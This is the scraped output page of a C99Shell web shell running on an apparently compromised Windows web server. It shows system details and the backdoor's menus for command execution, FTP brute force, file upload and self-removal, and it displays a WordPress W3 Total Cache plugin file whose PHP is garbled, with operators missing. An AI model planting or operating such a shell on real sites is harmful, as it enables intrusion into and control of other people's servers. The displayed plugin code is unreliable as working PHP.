!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Users\DMZ\Desktop\cumbreclima\wp-content\plugins\w3-total-cache\inc\options\cdn\common\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     cnames.php (1.44 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if (!defined('W3TC')) die(); ?>
<ol id="cdn_cnames">
<?php
if (! count($cnames)) {
    
$cnames = array('');
}

$count count($cnames);

foreach (
$cnames as $index => $cname):
    
$label '';

    if (
$count 1):
        switch (
$index):
            case 
0:
                
$label __('(reserved for CSS)''w3-total-cache');
                break;

            case 
1:
                
$label __('(reserved for JS in <head>)''w3-total-cache');
                break;

            case 
2:
                
$label __('(reserved for JS after <body>)''w3-total-cache');
                break;

            case 
3:
                
$label __('(reserved for JS before </body>)''w3-total-cache');
                break;

            default:
                
$label '';
                break;
        endswitch;
    endif;
?>
    <li>
        <input type="text" name="cdn_cnames[]"
                       <?php $this->sealing_disabled('cdn'?> value="<?php echo esc_attr($cname); ?>" size="60" />
        <input class="button cdn_cname_delete" type="button"
                       <?php $this->sealing_disabled('cdn'?> value="<?php _e('Delete''w3-total-cache'); ?>"<?php if (!$index): ?> style="display: none;"<?php endif; ?> />
        <span><?php echo htmlspecialchars($label); ?></span>
    </li>
<?php endforeach; ?>
</ol>
<input id="cdn_cname_add" class="button" type="button" value="<?php _e('Add CNAME''w3-total-cache'); ?>
    <?php $this->sealing_disabled('cdn'?> />

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--